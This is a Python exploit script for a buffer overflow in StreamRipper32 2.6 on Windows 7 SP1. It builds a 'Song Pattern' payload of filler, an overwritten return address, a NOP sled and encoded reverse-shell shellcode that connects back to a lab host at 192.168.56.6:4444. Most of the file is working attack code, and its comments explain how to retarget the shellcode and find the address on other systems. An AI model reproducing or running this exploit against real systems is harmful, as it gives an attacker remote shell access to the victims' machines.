#!/usr/bin/python

#Exploit Title: StreamRipper32 Buffer Overflow
#Date: 07/2019
#Exploit Author: Andrey Stoykov (OSCP)
#Tested On: Win7 SP1 x64
#Software Link: http://streamripper.sourceforge.net/sr32/StreamRipper32_2_6.exe
#Version: 2.6
#Steps To Reproduce: run this script to generate exploit.txt, then in StreamRipper32 double-click "Add" in the "Station/Song Section" and paste the contents of exploit.txt into "Song Pattern"

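# Bad characters for this input field, taken from the encoder invocation above
# (the filter the shellcode was encoded around). NUL, LF and CR are the usual
# string terminators; the 0xb4..0xbe bytes are specific to this target.
BAD_CHARS = b"\x00\x0a\x0d\xb4\xb8\xbc\xbd\xbe"

# windows/shell_reverse_tcp encoded with x86/alpha_mixed, connecting back to
# 192.168.56.6:4444 (the author's lab host). Regenerate it for your own
# LHOST/LPORT with the same bad-character list. The first six bytes are the
# alpha_mixed decoder stub; everything after it is alphanumeric.
SHELLCODE = (
    b"\xdb\xd7\xd9\x74\x24\xf4\x59\x49\x49\x49\x49\x49\x49\x49"
    b"\x49\x49\x49\x43\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a"
    b"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42"
    b"\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75"
    b"\x4a\x49\x39\x6c\x48\x68\x4b\x39\x53\x30\x65\x50\x63\x30"
    b"\x45\x30\x4f\x79\x6b\x55\x64\x71\x4b\x62\x42\x44\x4e\x6b"
    b"\x50\x52\x44\x70\x4e\x6b\x61\x42\x76\x6c\x4e\x6b\x61\x42"
    b"\x52\x34\x6c\x4b\x54\x32\x46\x48\x56\x6f\x6e\x57\x70\x4a"
    b"\x37\x56\x35\x61\x79\x6f\x56\x51\x4f\x30\x4c\x6c\x57\x4c"
    b"\x31\x71\x71\x6c\x46\x62\x46\x4c\x77\x50\x6f\x31\x38\x4f"
    b"\x66\x6d\x73\x31\x6b\x77\x79\x72\x78\x70\x66\x32\x33\x67"
    b"\x6e\x6b\x43\x62\x34\x50\x4c\x4b\x43\x72\x75\x6c\x57\x71"
    b"\x5a\x70\x6c\x4b\x61\x50\x30\x78\x6f\x75\x39\x50\x32\x54"
    b"\x63\x7a\x36\x61\x4a\x70\x36\x30\x4c\x4b\x51\x58\x34\x58"
    b"\x4c\x4b\x76\x38\x75\x70\x53\x31\x5a\x73\x79\x73\x35\x6c"
    b"\x32\x69\x6e\x6b\x66\x54\x4e\x6b\x56\x61\x49\x46\x35\x61"
    b"\x49\x6f\x74\x71\x6b\x70\x4c\x6c\x49\x51\x7a\x6f\x64\x4d"
    b"\x55\x51\x79\x57\x54\x78\x49\x70\x32\x55\x58\x74\x44\x43"
    b"\x73\x4d\x4b\x48\x55\x6b\x33\x4d\x76\x44\x33\x45\x6b\x52"
    b"\x66\x38\x6c\x4b\x53\x68\x44\x64\x35\x51\x38\x53\x73\x56"
    b"\x4c\x4b\x54\x4c\x70\x4b\x4c\x4b\x32\x78\x77\x6c\x35\x51"
    b"\x5a\x73\x6e\x6b\x65\x54\x4c\x4b\x76\x61\x7a\x70\x4e\x69"
    b"\x30\x44\x44\x64\x61\x34\x71\x4b\x73\x6b\x53\x51\x61\x49"
    b"\x62\x7a\x42\x71\x4b\x4f\x59\x70\x52\x78\x53\x6f\x62\x7a"
    b"\x6c\x4b\x57\x62\x4a\x4b\x4f\x76\x73\x6d\x51\x78\x74\x73"
    b"\x36\x52\x37\x70\x45\x50\x52\x48\x64\x37\x31\x63\x35\x62"
    b"\x33\x6f\x33\x64\x43\x58\x62\x6c\x33\x47\x36\x46\x37\x77"
    b"\x39\x6f\x7a\x75\x6f\x48\x6e\x70\x73\x31\x35\x50\x53\x30"
    b"\x45\x79\x68\x44\x43\x64\x46\x30\x32\x48\x56\x49\x6d\x50"
    b"\x72\x4b\x33\x30\x39\x6f\x39\x45\x50\x50\x52\x70\x76\x30"
    b"\x36\x30\x67\x30\x46\x30\x53\x70\x72\x70\x51\x78\x49\x7a"
    b"\x56\x6f\x39\x4f\x49\x70\x69\x6f\x78\x55\x6b\x39\x6b\x77"
    b"\x62\x48\x49\x50\x6f\x58\x54\x78\x53\x36\x50\x68\x73\x32"
    b"\x45\x50\x66\x71\x31\x4c\x4d\x59\x79\x76\x42\x4a\x64\x50"
    b"\x72\x76\x62\x77\x65\x38\x6e\x79\x6e\x45\x42\x54\x73\x51"
    b"\x69\x6f\x78\x55\x61\x78\x35\x33\x30\x6d\x51\x74\x57\x70"
    b"\x6b\x39\x4d\x33\x43\x67\x31\x47\x36\x37\x66\x51\x69\x66"
    b"\x71\x7a\x75\x42\x32\x79\x62\x76\x59\x72\x69\x6d\x52\x46"
    b"\x4b\x77\x51\x54\x31\x34\x65\x6c\x77\x71\x55\x51\x6c\x4d"
    b"\x30\x44\x74\x64\x56\x70\x49\x56\x57\x70\x53\x74\x72\x74"
    b"\x32\x70\x42\x76\x50\x56\x70\x56\x51\x56\x32\x76\x42\x6e"
    b"\x66\x36\x33\x66\x73\x63\x66\x36\x45\x38\x64\x39\x58\x4c"
    b"\x55\x6f\x4c\x46\x79\x6f\x79\x45\x6e\x69\x69\x70\x42\x6e"
    b"\x61\x46\x77\x36\x49\x6f\x30\x30\x35\x38\x45\x58\x4c\x47"
    b"\x45\x4d\x51\x70\x79\x6f\x38\x55\x4d\x6b\x4b\x50\x65\x4d"
    b"\x57\x5a\x55\x5a\x73\x58\x49\x36\x4c\x55\x6d\x6d\x4d\x4d"
    b"\x59\x6f\x6a\x75\x77\x4c\x64\x46\x73\x4c\x77\x7a\x4b\x30"
    b"\x59\x6b\x59\x70\x50\x75\x33\x35\x6f\x4b\x61\x57\x46\x73"
    b"\x62\x52\x70\x6f\x61\x7a\x45\x50\x33\x63\x69\x6f\x78\x55"
    b"\x41\x41"
)

# Value written over the saved return address: 0x74302E3F inside comctl32.DLL
# on the tested Win7 SP1 x64 install, stored little-endian. The original does
# not record which instruction lives there (presumably a pivot into the NOP
# sled that follows -- confirm in a debugger), and the address must be
# re-found on any other OS or DLL build.
RET_ADDR = b"\x3f\x2e\x30\x74"

OFFSET = 256      # filler bytes before the saved return address
NOP_COUNT = 10    # short NOP sled between RET_ADDR and the shellcode
# The original trailer, "C"*(260-256-4-10), is a negative repeat count and so
# was empty; keep it at zero so the written payload matches the tested one.
TRAILER_LEN = 0
OUTPUT_PATH = "exploit.txt"


def find_bad_chars(data, bad_chars=BAD_CHARS):
    """Return the bytes of *bad_chars* (as 1-byte objects) that occur in *data*.

    Slicing rather than iterating keeps this working on both Python 2 (str)
    and Python 3 (bytes).
    """
    return [bad_chars[i:i + 1] for i in range(len(bad_chars))
            if bad_chars[i:i + 1] in data]


def build_payload(offset=OFFSET, ret_addr=RET_ADDR, nop_count=NOP_COUNT,
                  shellcode=SHELLCODE, trailer_len=TRAILER_LEN,
                  bad_chars=BAD_CHARS):
    """Assemble the overflow string: filler, return address, NOP sled, shellcode, trailer.

    Raises ValueError if the result contains any byte from *bad_chars*; such a
    payload would be truncated or mangled by the target before it runs, so it
    is better to fail here than to write a broken exploit.txt.
    """
    payload = (b"A" * offset + ret_addr + b"\x90" * nop_count
               + shellcode + b"C" * trailer_len)
    bad = find_bad_chars(payload, bad_chars)
    if bad:
        raise ValueError("payload contains bad characters: %r" % (bad,))
    return payload


def main(path=OUTPUT_PATH):
    """Write the payload to *path* in binary mode so the bytes are emitted verbatim."""
    with open(path, "wb") as fh:
        fh.write(build_payload())


if __name__ == "__main__":
    main()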